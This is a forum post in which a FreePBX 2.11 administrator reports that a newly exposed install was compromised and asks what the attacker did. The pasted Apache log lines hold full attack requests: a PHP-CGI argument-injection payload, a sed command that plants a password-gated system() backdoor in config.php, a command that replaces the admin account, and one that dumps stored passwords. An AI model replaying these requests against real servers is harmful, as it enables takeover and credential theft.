Hi,
I have recently opened freepbx recent install to outside world and it was hacked nearly immediately. Does any one aware of its vulnerability?What was definitely hacked:
- admin FreeBPX panel password has been changed;
- the access to all configs including sip accounts has been gained;
3)mysql pasword of freepbx user was also gained
4)ability to execute shell_commands - several strange queries in Apach logs have been found:
a)
“POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
which is decoded in
-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=”" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
What does this do?
b)
46.165.220.215 - - [11/Mar/2014:00:42:28 +0200] “GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=sed%20-i%20’s/.<?php./<?php\nif\($_GET[“function”]==“system”\)%20exit\(\);\nif\(md5\($_REQUEST[“p”]\)==“c82e1edd948c8b34457e3e5fa17d1732”\)%20@system\($_REQUEST[“mgk”]\);/’%20config.php HTTP/1.1” 200 458 “-” “curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
c)
79.143.80.226 - - [12/Mar/2014:00:44:06 +0200] “GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=shell_exec&args=ls HTTP/1.1” 200 622 “-” “curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
d)
46.165.220.215 - - [11/Mar/2014:00:42:28 +0200] “GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=mysql%20-uasterisk%20-pyIoJkMNop%20asterisk%20–execute%20"truncate%20ampusers”;%20mysql%20-uasterisk%20-pyIoJkMNop%20asterisk%20–execute%20"INSERT%20INTO%20ampusers%20(username,%20password_sha1,%20sections)%20VALUES%20(%27sona%27,%20%2719ad8cfe45a840a69d4dfcbb02ef9db41bb2ceb0%27,%20%27*%27)” HTTP/1.1” 200 458 “-” “curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
46.165.220.215 - - [11/Mar/2014:00:42:28 +0200] “GET /freepbx/admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=echo%20-e%20”-Amportal.conf%20Passwords:\n”;%20grep%20PASS%20/etc/amportal.conf;%20echo%20-e%20"\n-sip_additional.conf:\n";%20cat%20/etc/asterisk/sip_additional.conf|grep%20-v%20’;’ HTTP/1.1" 200 1075 “-” “curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5”
So what am I worry about:
- have they left some code which can repeat the hack again from inside?
2)is there a chance they have gotten root system password?
3)Is this a known problem?
4)Is it going to be fixed?
5)How safe is to open FreePbx outside the local network?
FreePBX 2.11.0
Thanks.